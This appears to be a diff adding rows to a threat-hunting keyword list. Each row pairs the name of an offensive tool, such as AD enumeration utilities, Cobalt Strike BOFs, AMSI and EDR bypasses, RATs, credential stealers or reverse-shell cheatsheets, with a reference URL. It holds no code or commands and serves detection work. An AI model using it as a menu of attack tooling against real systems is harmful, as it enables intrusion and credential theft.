+"AD_Enumeration_Hunt","https://github.com/alperenugurlu/AD_Enumeration_Hunt" +"ADACLScanner","https://github.com/canix1/ADACLScanner" +"adalanche","https://github.com/lkarlslund/Adalanche" +"Adblock Office VPN Proxy Server","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"adconnectdump","https://github.com/fox-it/adconnectdump" +"ADCSKiller","https://github.com/grimlockx/ADCSKiller" +"ADCSPwn","https://github.com/bats3c/ADCSPwn" +"adexplorer","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer" 
+"ADExplorerSnapshot.py","https://github.com/c3c/ADExplorerSnapshot.py" +"adfind","https://www.joeware.net/freetools/tools/adfind/usage.htm" +"adfind","N/A" +"adfind","http://www.joeware.net/freetools/tools/adfind/index.htm" +"adfind","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/" +"ADFSpoof","https://github.com/mandiant/ADFSpoof" +"adfspray","https://github.com/xFreed0m/ADFSpray" +"adget","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/" +"AdGuard VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"adhunt","https://github.com/karendm/ADHunt" +"adidnsdump","https://github.com/dirkjanm/adidnsdump" +"ad-ldap-enum","https://github.com/CroweCybersecurity/ad-ldap-enum" +"Admin2Sys","https://github.com/S12cybersecurity/Admin2Sys" +"adrecon","https://github.com/adrecon/ADRecon" +"adsearch","https://github.com/tomcarver16/ADSearch" +"advanced port scanner","https://www.advanced-port-scanner.com/" +"advanced-ip-scanner","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox" +"Advanced-SQL-Injection-Cheatsheet","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet" +"afrog","https://github.com/zan8in/afrog" +"AggressorScripts-1","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence" +"AggressorScripts-1","https://github.com/Cn33liz/AggressorScripts-1" +"AhMyth-Android-RAT","https://github.com/AhMyth/AhMyth-Android-RAT" +"Airbash","https://github.com/tehw0lf/airbash" +"aircrack-ng","https://github.com/aircrack-ng/aircrack-ng" +"Airgeddon","https://github.com/v1s1t0r1sh3r3/airgeddon" +"airmon-ng","https://www.aircrack-ng.org/doku.php?id=airmon-ng" +"airpwn-ng","https://github.com/ICSec/airpwn-ng" +"AlanFramework","https://github.com/enkomio/AlanFramework" +"Alcatraz","https://github.com/weak1337/Alcatraz" 
+"al-khaser","https://github.com/LordNoteworthy/al-khaser" +"Amass","https://github.com/OWASP/Amass" +"amass","https://github.com/caffix/amass" +"amsi.fail","https://amsi.fail/" +"Amsi_Bypass","https://github.com/senzee1984/Amsi_Bypass_In_2023" +"AMSI_patch","https://github.com/TheD1rkMtr/AMSI_patch" +"Amsi-Killer","https://github.com/ZeroMemoryEx/Amsi-Killer" +"AndrewSpecial","https://github.com/hoangprod/AndrewSpecial" +"Anevicon","https://github.com/rozgo/anevicon" +"anonfiles.com","https://twitter.com/mthcht/status/1660953897622544384" +"Anonymous Proxy Vpn Browser","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Antivirus Signature","N/A" +"Antivirus Signature","lsass dump malware signature" +"Antivirus Signature","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt" +"anydesk","https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection" +"anydesk","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/" +"anymailfinder","https://anymailfinder.com" +"AoratosWin","https://github.com/PinoyWH1Z/AoratosWin" +"APCLdr","https://github.com/NUL0x4C/APCLdr" +"apkfold free vpn","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"apollon","https://github.com/codewhitesec/apollon" +"APT","N/A" +"APTSimulator","https://github.com/NextronSystems/APTSimulator" +"aquatone","https://github.com/michenriksen/aquatone" +"archerysec","https://github.com/archerysec/archerysec" +"archstrike","https://archstrike.org/" +"Ares","https://github.com/sweetsoftware/Ares" +"armitage","https://github.com/r00t0v3rr1d3/armitage" 
+"arpspoofing","https://github.com/luijait/arpspoofing" +"ASREPRoast","https://github.com/HarmJ0y/ASREPRoast" +"assoc","N/A" +"Astar VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Atera","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/" +"AtlasC2","https://github.com/Gr1mmie/AtlasC2" +"AtlasReaper","https://github.com/werdhaihai/AtlasReaper" +"AtomLdr","https://github.com/NUL0x4C/AtomLdr" +"ATPMiniDump","https://github.com/b4rtik/ATPMiniDump" +"AttackSurfaceMapper","https://github.com/superhedgy/AttackSurfaceMapper" +"attifyos","https://github.com/adi0x90/attifyos" +"attrib","N/A" +"attrib","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md" +"Augustus","https://github.com/TunnelGRE/Augustus" +"autobloody","https://github.com/CravateRouge/autobloody" +"AutoC2","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2" +"autonse","https://github.com/m4ll0k/AutoNSE" +"autopwn","https://github.com/nccgroup/autopwn" +"AutoRDPwn","https://github.com/JoelGMSec/AutoRDPwn" +"AutoSmuggle","https://github.com/surajpkhetani/AutoSmuggle" +"autotimeliner","https://github.com/andreafortuna/autotimeliner" +"avet","https://github.com/govolution/avet" +"avred","https://github.com/dobin/avred" +"Awesome-Hacking","https://github.com/Hack-with-Github/Awesome-Hacking" +"Awesome-Hacking-Resources","https://github.com/vitalysim/Awesome-Hacking-Resources" +"awesome-osint","https://github.com/jivoi/awesome-osint" +"awesome-pentest","https://github.com/enaqx/awesome-pentest" +"awesome-pentest-cheat-sheets","https://github.com/coreb1t/awesome-pentest-cheat-sheets" +"awesome-scapy","https://github.com/secdev/awesome-scapy" +"awesome-static-analysis","https://github.com/codefactor-io/awesome-static-analysis" +"awesome-web-security","https://github.com/qazbnm456/awesome-web-security" 
+"awesome-windows-domain-hardening","https://github.com/PaulSec/awesome-windows-domain-hardening" +"AWS-Loot","https://github.com/sebastian-mora/AWS-Loot" +"Azino VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Azure-AccessPermissions","https://github.com/csandker/Azure-AccessPermissions" +"AzureAD_Autologon_Brute","https://github.com/nyxgeek/AzureAD_Autologon_Brute" +"AzureADLateralMovement","https://github.com/talmaor/AzureADLateralMovement" +"AzureC2Relay","https://github.com/Flangvik/AzureC2Relay" +"b374k","https://github.com/b374k/b374k" +"BabelStrike","https://github.com/t3l3machus/BabelStrike" +"backdoor keyword","N/A" +"Backstab","https://github.com/Yaxser/Backstab" +"BackupOperatorToDA","https://github.com/mpgn/BackupOperatorToDA" +"badazure","https://github.com/mvelazc0/BadZure/" +"Bad-PDF","https://github.com/deepzec/Bad-Pdf" +"badtouch","https://github.com/kpcyrd/badtouch" +"BaRMIe","https://github.com/NickstaDB/BaRMIe" +"base64","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass" +"bash","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" +"bash","N/A" +"bash","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"bash","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml" +"bash","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml" +"bash keylogger","N/A" +"bash port scan","N/A" +"Bashfuscator","https://github.com/Bashfuscator/Bashfuscator" +"bashupload.com","https://twitter.com/mthcht/status/1660953897622544384" +"bcdedit","N/A" +"beef","https://github.com/beefproject/beef" +"BeeLogger","https://github.com/4w4k3/BeeLogger" 
+"BelkaVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"BeRoot","https://github.com/AlessandroZ/BeRoot" +"BesoToken","https://github.com/OmriBaso/BesoToken" +"Best VPN USA","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"BetterBackdoor","https://github.com/thatcherclough/BetterBackdoor" +"bettercap","https://github.com/bettercap/bettercap" +"betterdefaultpasslist","https://github.com/govolution/betterdefaultpasslist" +"binwalk","https://github.com/ReFirmLabs/binwalk" +"bitb","https://github.com/mrd0x/BITB" +"bitsadmin","N/A" +"bittorent","https[://]www[.]bittorrent.com/fr/" +"Biu-framework","https://awesomeopensource.com/project/0xbug/Biu-framework" +"blackcat ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/" +"Blackout","https://github.com/ZeroMemoryEx/Blackout" +"BlockEtw","https://github.com/Soledge/BlockEtw" +"BlockOpenHandle","https://github.com/TheD1rkMtr/BlockOpenHandle" +"BlockWindows","https://github.com/WindowsLies/BlockWindows" +"bloodhound","https://github.com/fox-it/BloodHound.py" +"bloodhound","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors" +"BloodHound","https://github.com/BloodHoundAD/BloodHound" +"BloodHound.py","https://github.com/fox-it/BloodHound.py" +"bloodhound-quickwin","https://github.com/kaluche/bloodhound-quickwin" +"bloodyAD","https://github.com/CravateRouge/bloodyAD" +"BOF.NET","https://github.com/CCob/BOF.NET" +"bof-collection","https://github.com/cube0x0/MiniDump" +"bof-collection","https://github.com/crypt0p3g/bof-collection" +"bofhound","https://github.com/fortalice/bofhound" +"BOFMask","https://github.com/passthehashbrowns/BOFMask" 
+"BOINC","https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp" +"boko","https://github.com/bashexplode/boko" +"bootkit-rs","https://github.com/memN0ps/bootkit-rs" +"bropper","https://github.com/Hakumarachi/Bropper" +"Browsec VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Browser VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Browser-C2","https://github.com/0x09AL/Browser-C2" +"Browser-password-stealer","https://github.com/henry-richard7/Browser-password-stealer" +"bruteratel","https://bruteratel.com/" +"BruteSploit","https://github.com/screetsec/Vegile" +"BruteSploit","https://github.com/screetsec/Microsploit" +"BruteSploit","https://github.com/screetsec/BruteSploit" +"brutespray","https://github.com/x90skysn3k/brutespray" +"BruteX","https://github.com/1N3/BruteX" +"BucketLoot","https://github.com/redhuntlabs/BucketLoot" +"bulletpassview","https://www.nirsoft.net/utils/bullets_password_view.html" +"BullVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"burpsuite","https://github.com/signorrayan/RedTeam_toolkit" +"burpsuite","https://github.com/nccgroup/BurpSuiteHTTPSmuggler" +"burpsuite","https://portswigger.net/burp" +"burpsuite","https://portswigger.net/" +"burpsuite","https://github.com/Mr-xn/BurpSuite-collections" +"burpsuite","https://github.com/infodel/burp.extension-payloadparser" +"burpsuite","https://github.com/attackercan/burp-xss-sql-plugin" +"burpsuite","https://github.com/laconicwolf/burp-extensions" +"burpsuite","https://github.com/JGillam/burp-co2" +"byob","https://github.com/malwaredllc/byob" 
+"BYOVD_kill_av_edr","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c" +"BypassCredGuard","https://github.com/wh0amitz/BypassCredGuard" +"bypasswaf","https://github.com/codewatchorg/bypasswaf" +"C2 related tools","https://github.com/mgeeky/ShellcodeFluctuation" +"C2 related tools","https://github.com/mgeeky/ThreadStackSpoofer" +"C2 related tools","https://github.com/Rvn0xsy/Cooolis-ms" +"C2 related tools","https://github.com/med0x2e/SigFlip" +"C2 related tools","https://github.com/aeverj/NimShellCodeLoader" +"C2 related tools","https://github.com/bitsadmin/nopowershell" +"C2 related tools","https://github.com/Ed1s0nZ/cool" +"C2_Server","https://github.com/reveng007/C2_Server" +"C2concealer","https://github.com/RedSiege/C2concealer" +"C2-Tool-Collection","https://github.com/outflanknl/C2-Tool-Collection" +"CACTUSTORCH","https://github.com/mdsecactivebreach/CACTUSTORCH" +"Cain&Abel","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md" +"CandyPotato","https://github.com/klezVirus/CandyPotato" +"CarbonCopy","https://github.com/paranoidninja/CarbonCopy" +"cat","N/A" +"cat","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"catphish","https://github.com/ring0lab/catphish" +"cdn-proxy","https://github.com/RyanJarv/cdn-proxy" +"celerystalk","https://github.com/sethsec/celerystalk" +"cerbrutus","https://github.com/Cerbrutus-BruteForcer/cerbrutus" +"Certipy","https://github.com/ly4k/Certipy" +"CertStealer","https://github.com/TheWover/CertStealer" +"certsync","https://github.com/zblurx/certsync" +"changeme","https://github.com/ztgrace/changeme" +"chaos","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging" +"charles-proxy","https://charlesproxy.com/" +"charlotte","https://github.com/9emin1/charlotte" +"chcp","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/" 
+"CheckPlease","https://github.com/Arvanaghi/CheckPlease" +"CheeseTools","https://github.com/klezVirus/CheeseTools" +"chimera","https://github.com/tokyoneon/Chimera/" +"Chimera","https://github.com/georgesotiriadis/Chimera" +"chisel","https://github.com/jpillora/chisel" +"ChkNull","https://github.com/nyxgeek/classic_hacking_tools" +"chromedump","https://github.com/g4l4drim/ChromeDump" +"chromepass","https://www.nirsoft.net/utils/chromepass.html" +"chromium","https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html" +"chromium","https://www.mandiant.com/resources/blog/lnk-between-browsers" +"chromium","https://redcanary.com/blog/intelligence-insights-june-2023/" +"CIMplant","https://github.com/RedSiege/CIMplant" +"cirt-fuzzer","https://www.ecrimelabs.com/" +"cloakify","https://github.com/TryCatchHCF/Cloakify" +"CloakNDaggerC2","https://github.com/matt-culbert/CloakNDaggerC2" +"Cloud VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"cloud_enum","https://github.com/initstring/cloud_enum" +"cloudsploit","https://github.com/aquasecurity/cloudsploit" +"CMSeek","https://github.com/Tuhinshubhra/CMSeek" +"cobaltstrike","https://github.com/outflanknl/Recon-AD" +"cobaltstrike","https://github.com/outflanknl/InlineWhispers" +"cobaltstrike","https://github.com/outflanknl/Spray-AD" +"cobaltstrike","https://github.com/p292/Phant0m_cobaltstrike" +"cobaltstrike","https://github.com/outflanknl/WdToggle" +"cobaltstrike","https://github.com/outflanknl/FindObjects-BOF" +"cobaltstrike","https://github.com/optiv/Dent" +"cobaltstrike","https://github.com/OneHone/C--Shellcode" +"cobaltstrike","https://github.com/optiv/Registry-Recon" +"cobaltstrike","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor" +"cobaltstrike","https://github.com/optiv/ScareCrow" 
+"cobaltstrike","https://github.com/RiccardoAncarani/BOFs"
+"cobaltstrike","https://github.com/realoriginal/beacon-object-file"
+"cobaltstrike","https://github.com/RiccardoAncarani/LiquidSnake"
+"cobaltstrike","https://github.com/rkervella/CarbonMonoxide"
+"cobaltstrike","https://github.com/RiccardoAncarani/TaskShell"
+"cobaltstrike","https://github.com/RCStep/CSSG"
+"cobaltstrike","https://github.com/pureqh/bypassAV"
+"cobaltstrike","https://github.com/praetorian-inc/PortBender"
+"cobaltstrike","https://github.com/pwn1sher/CS-BOFs"
+"cobaltstrike","https://github.com/rasta-mouse/TikiTorch"
+"cobaltstrike","https://github.com/rasta-mouse/PPEnum"
+"cobaltstrike","https://github.com/OG-Sadpanda/SharpZippo"
+"cobaltstrike","https://github.com/netero1010/RDPHijack-BOF"
+"cobaltstrike","https://github.com/netero1010/Quser-BOF"
+"cobaltstrike","https://github.com/netero1010/ServiceMove-BOF"
+"cobaltstrike","https://github.com/nettitude/RunOF"
+"cobaltstrike","https://github.com/netero1010/TrustedPath-UACBypass-BOF"
+"cobaltstrike","https://github.com/nccgroup/nccfsas/"
+"cobaltstrike","https://github.com/mlcsec/ASRenum-BOF"
+"cobaltstrike","https://github.com/mgeeky/RedWarden"
+"cobaltstrike","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF"
+"cobaltstrike","https://github.com/nccgroup/nccfsas"
+"cobaltstrike","https://github.com/Mr-Un1k0d3r/SCShell"
+"cobaltstrike","https://github.com/OG-Sadpanda/SharpCalendar"
+"cobaltstrike","https://github.com/offsecginger/AggressorScripts"
+"cobaltstrike","https://github.com/OG-Sadpanda/SharpCat"
+"cobaltstrike","https://github.com/OG-Sadpanda/SharpSword"
+"cobaltstrike","https://github.com/OG-Sadpanda/SharpExcelibur"
+"cobaltstrike","https://github.com/Octoberfest7/KillDefender_BOF"
+"cobaltstrike","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence"
+"cobaltstrike","https://github.com/nick-frischkorn/TokenStripBOF"
+"cobaltstrike","https://github.com/obscuritylabs/RAI"
+"cobaltstrike","https://github.com/Octoberfest7/KDStab"
+"cobaltstrike","https://github.com/Octoberfest7/EventViewerUAC_BOF"
+"cobaltstrike","https://github.com/rookuu/BOFs"
+"cobaltstrike","https://github.com/Unknow101/FuckThatPacker"
+"cobaltstrike","https://github.com/uknowsec/TailorScan"
+"cobaltstrike","https://github.com/vysecurity/ANGRYPUPPY"
+"cobaltstrike","https://github.com/WKL-Sec/HiddenDesktop"
+"cobaltstrike","https://github.com/wahyuhadi/beacon-c2-go"
+"cobaltstrike","https://github.com/Tylous/SourcePoint"
+"cobaltstrike","https://github.com/trustedsec/CS-Situational-Awareness-BOF"
+"cobaltstrike","https://github.com/trustedsec/CS-Remote-OPs-BOF"
+"cobaltstrike","https://github.com/trustedsec/ELFLoader"
+"cobaltstrike","https://github.com/Tycx2ry/SweetPotato_CS"
+"cobaltstrike","https://github.com/trustedsec/PPLFaultDumpBOF"
+"cobaltstrike","https://github.com/YDHCUI/csload.net"
+"cobaltstrike","https://github.com/Yaxser/COFFLoader2"
+"cobaltstrike","https://github.com/YDHCUI/manjusaka"
+"cobaltstrike","https://www.cobaltstrike.com/"
+"cobaltstrike","https://github.com/zha0gongz1/DesertFox"
+"cobaltstrike","https://github.com/Yaxser/CobaltStrike-BOF"
+"cobaltstrike","https://github.com/wumb0/rust_bof"
+"cobaltstrike","https://github.com/WKL-Sec/Winsocky"
+"cobaltstrike","https://github.com/xforcered/CredBandit"
+"cobaltstrike","https://github.com/yanghaoi/CobaltStrike_CNA"
+"cobaltstrike","https://github.com/xforcered/Detect-Hooks"
+"cobaltstrike","https://github.com/trustedsec/COFFLoader"
+"cobaltstrike","https://github.com/securifybv/Visual-Studio-BOF-template"
+"cobaltstrike","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData"
+"cobaltstrike","https://github.com/seventeenman/CallBackDump"
+"cobaltstrike","https://github.com/SpiderLabs/SharpCompile"
+"cobaltstrike","https://github.com/Sh0ckFR/InlineWhispers2"
+"cobaltstrike","https://github.com/rxwx/cs-rdll-ipc-example"
+"cobaltstrike","https://github.com/rsmudge/Malleable-C2-Profiles"
+"cobaltstrike","https://github.com/rsmudge/ElevateKit"
+"cobaltstrike","https://github.com/rsmudge/unhook-bof"
+"cobaltstrike","https://github.com/rvrsh3ll/BOF_Collection"
+"cobaltstrike","https://github.com/rsmudge/ZeroLogon-BOF"
+"cobaltstrike","https://github.com/timwhitez/Doge-Loader"
+"cobaltstrike","https://github.com/tijme/kernel-mii"
+"cobaltstrike","https://github.com/tomcarver16/BOF-DLL-Inject"
+"cobaltstrike","https://github.com/trainr3kt/Readfile_BoF"
+"cobaltstrike","https://github.com/trainr3kt/MemReader_BoF"
+"cobaltstrike","https://github.com/threatexpress/red-team-scripts"
+"cobaltstrike","https://github.com/tevora-threat/PowerView3-Aggressor"
+"cobaltstrike","https://github.com/tevora-threat/aggressor-powerview"
+"cobaltstrike","https://github.com/threatexpress/cs2modrewrite"
+"cobaltstrike","https://github.com/threatexpress/random_c2_profile"
+"cobaltstrike","https://github.com/threatexpress/malleable-c2"
+"cobaltstrike","https://github.com/C0axx/AggressorScripts"
+"cobaltstrike","https://github.com/byt3bl33d3r/BOF-Nim"
+"cobaltstrike","https://github.com/CCob/BOF.NET"
+"cobaltstrike","https://github.com/Cobalt-Strike/beacon_health_check"
+"cobaltstrike","https://github.com/ceramicskate0/BOF-Builder"
+"cobaltstrike","https://github.com/BronzeTicket/ClipboardWindow-Inject"
+"cobaltstrike","https://github.com/boku7/injectEtwBypass"
+"cobaltstrike","https://github.com/boku7/injectAmsiBypass"
+"cobaltstrike","https://github.com/boku7/spawn"
+"cobaltstrike","https://github.com/boku7/xPipe"
+"cobaltstrike","https://github.com/boku7/whereami"
+"cobaltstrike","https://github.com/CrossC2/CrossC2Kit"
+"cobaltstrike","https://github.com/crisprss/PrintSpoofer"
+"cobaltstrike","https://github.com/crypt0p3g/bof-collection"
+"cobaltstrike","https://github.com/DallasFR/Cobalt-Clip"
+"cobaltstrike","https://github.com/cube0x0/LdapSignCheck"
+"cobaltstrike","https://github.com/cribdragg3r/Alaris"
+"cobaltstrike","https://github.com/Cobalt-Strike/unhook-bof"
+"cobaltstrike","https://github.com/Cobalt-Strike/sleep_python_bridge"
+"cobaltstrike","https://github.com/CodeXTF2/Burp2Malleable"
+"cobaltstrike","https://github.com/Cracked5pider/CoffeeLdr"
+"cobaltstrike","https://github.com/connormcgarr/tgtdelegation"
+"cobaltstrike","https://github.com/boku7/HOLLOW"
+"cobaltstrike","https://github.com/Adminisme/ServerScan"
+"cobaltstrike","https://github.com/1135/1135-CobaltStrike-ToolKit"
+"cobaltstrike","https://github.com/airbus-cert/Invoke-Bof"
+"cobaltstrike","https://github.com/alfarom256/BOF-ForeignLsass"
+"cobaltstrike","https://github.com/ajpc500/BOFs"
+"cobaltstrike","https://github.com/0xthirteen/StayKit"
+"cobaltstrike","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc"
+"cobaltstrike","https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/"
+"cobaltstrike","https://github.com//EspressoCake/HandleKatz_BOF"
+"cobaltstrike","https://github.com/0xthirteen/MoveKit"
+"cobaltstrike","https://github.com/0x3rhy/AddUser-Bof"
+"cobaltstrike","https://github.com/Axx8/ShellCode_Loader"
+"cobaltstrike","https://github.com/ausecwa/bof-registry"
+"cobaltstrike","https://github.com/BC-SECURITY/Malleable-C2-Profiles"
+"cobaltstrike","https://github.com/boku7/BokuLoader"
+"cobaltstrike","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer"
+"cobaltstrike","https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset"
+"cobaltstrike","https://github.com/anthemtotheego/Detect-Hooks"
+"cobaltstrike","https://github.com/AlphabugX/csOnvps"
+"cobaltstrike","https://github.com/anthemtotheego/InlineExecute-Assembly"
+"cobaltstrike","https://github.com/apokryptein/secinject"
+"cobaltstrike","https://github.com/anthemtotheego/SharpCradle"
+"cobaltstrike","https://github.com/darkr4y/geacon"
+"cobaltstrike","https://github.com/Henkru/cs-token-vault"
+"cobaltstrike","https://github.com/Hangingsword/HouQing"
+"cobaltstrike","https://github.com/IcebreakerSecurity/DelegationBOF"
+"cobaltstrike","https://github.com/idiotc4t/Reflective-HackBrowserData"
+"cobaltstrike","https://github.com/IcebreakerSecurity/PersistBOF"
+"cobaltstrike","https://github.com/hack2fun/BypassAV"
+"cobaltstrike","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike"
+"cobaltstrike","https://github.com/Gality369/CS-Loader"
+"cobaltstrike","https://github.com/GhostPack/Koh"
+"cobaltstrike","https://github.com/guervild/BOFs"
+"cobaltstrike","https://github.com/gloxec/CrossC2"
+"cobaltstrike","https://github.com/m57/cobaltstrike_bofs"
+"cobaltstrike","https://github.com/lengjibo/NetUser"
+"cobaltstrike","https://github.com/mdsecactivebreach/CACTUSTORCH"
+"cobaltstrike","https://github.com/mez-0/winrmdll"
+"cobaltstrike","https://github.com/med0x2e/SigFlip"
+"cobaltstrike","https://github.com/kyleavery/inject-assembly"
+"cobaltstrike","https://github.com/jas502n/bypassAV-1"
+"cobaltstrike","https://github.com/improsec/SharpEventPersist"
+"cobaltstrike","https://github.com/k8gege/Ladon"
+"cobaltstrike","https://github.com/kyleavery/AceLdr"
+"cobaltstrike","https://github.com/k8gege/scrun"
+"cobaltstrike","https://github.com/G0ldenGunSec/GetWebDAVStatus"
+"cobaltstrike","https://github.com/EncodeGroup/BOF-RegSave"
+"cobaltstrike","https://github.com/EncodeGroup/AggressiveProxy"
+"cobaltstrike","https://github.com/EncodeGroup/UAC-SilentClean"
+"cobaltstrike","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF"
+"cobaltstrike","https://github.com/EspressoCake/DLL_Imports_BOF"
+"cobaltstrike","https://github.com/eddiezab/aggressor-scripts/tree/master"
+"cobaltstrike","https://github.com/dcsync/pycobalt"
+"cobaltstrike","https://github.com/Daybr4ak/C2ReverseProxy"
+"cobaltstrike","https://github.com/DeEpinGh0st/Erebus"
+"cobaltstrike","https://github.com/dtmsecurity/bof_helper"
+"cobaltstrike","https://github.com/dr0op/CrossNet-Beta"
+"cobaltstrike","https://github.com/ewby/Mockingjay_BOF"
+"cobaltstrike","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF"
+"cobaltstrike","https://github.com/FalconForceTeam/BOF2shellcode"
+"cobaltstrike","https://github.com/FunnyWolf/pystinger"
+"cobaltstrike","https://github.com/fcre1938/goShellCodeByPassVT"
+"cobaltstrike","https://github.com/EspressoCake/Self_Deletion_BOF"
+"cobaltstrike","https://github.com/EspressoCake/HandleKatz_BOF"
+"cobaltstrike","https://github.com/EspressoCake/Firewall_Walker_BOF"
+"cobaltstrike","https://github.com/EspressoCake/Needle_Sift_BOF"
+"cobaltstrike","https://github.com/EspressoCake/Process_Protection_Level_BOF"
+"cobaltstrike","https://github.com/EspressoCake/PPLDump_BOF"
+"Coercer","https://github.com/p0dalirius/Coercer"
+"combine_harvester","https://github.com/m3f157O/combine_harvester"
+"COMHunter","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter"
+"COM-Hunter","https://github.com/nickvourd/COM-Hunter"
+"commando-vm","https://github.com/mandiant/commando-vm"
+"commix","https://github.com/commixproject/commix"
+"ConPtyShell","https://github.com/antonioCoco/ConPtyShell"
+"ContainYourself","https://github.com/deepinstinct/ContainYourself"
+"conti","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/"
+"Conti Ranwomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/"
+"copy","N/A"
+"copy","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
+"covenant","https://github.com/cobbr/Covenant"
+"Cowpatty","https://github.com/joswr1ght/cowpatty"
+"cp","N/A"
+"Cr3dOv3r","https://github.com/D4Vinci/Cr3dOv3r"
+"crack.sh","https://crack.sh/get-cracking/"
+"Crack-allDBs","https://github.com/d3ckx1/Crack-allDBs"
+"cracklord","https://github.com/jmmcatee/cracklord"
+"crackmapexec","https://github.com/Porchetta-Industries/CrackMapExec"
+"crackmapexec","https://github.com/byt3bl33d3r/CrackMapExec"
+"crackpkcs12","https://github.com/crackpkcs12/crackpkcs12"
+"Crassus","https://github.com/vu-ls/Crassus"
+"CredPhisher","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher"
+"CredsLeaker","https://github.com/Dviros/CredsLeaker"
+"crond","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml"
+"Cronos-Rootkit","https://github.com/XaFF-XaFF/Cronos-Rootkit"
+"crontab","N/A"
+"crossc2","https://github.com/gloxec/CrossC2"
+"CrossLinked","https://github.com/m8r0wn/CrossLinked"
+"Crowbar","https://github.com/galkan/crowbar"
+"crunch","https://sourceforge.net/projects/crunch-wordlist/"
+"crypto_identifier","https://github.com/Acceis/crypto_identifier"
+"CSExec","https://github.com/Metro-Holografix/CSExec.py"
+"csploit","https://github.com/cSploit/android"
+"ctfr","https://github.com/UnaPibaGeek/ctfr"
+"ctftool","https://github.com/taviso/ctftool"
+"cuddlephish","https://github.com/fkasler/cuddlephish"
+"curlshell","https://github.com/irsl/curlshell"
+"cut","N/A"
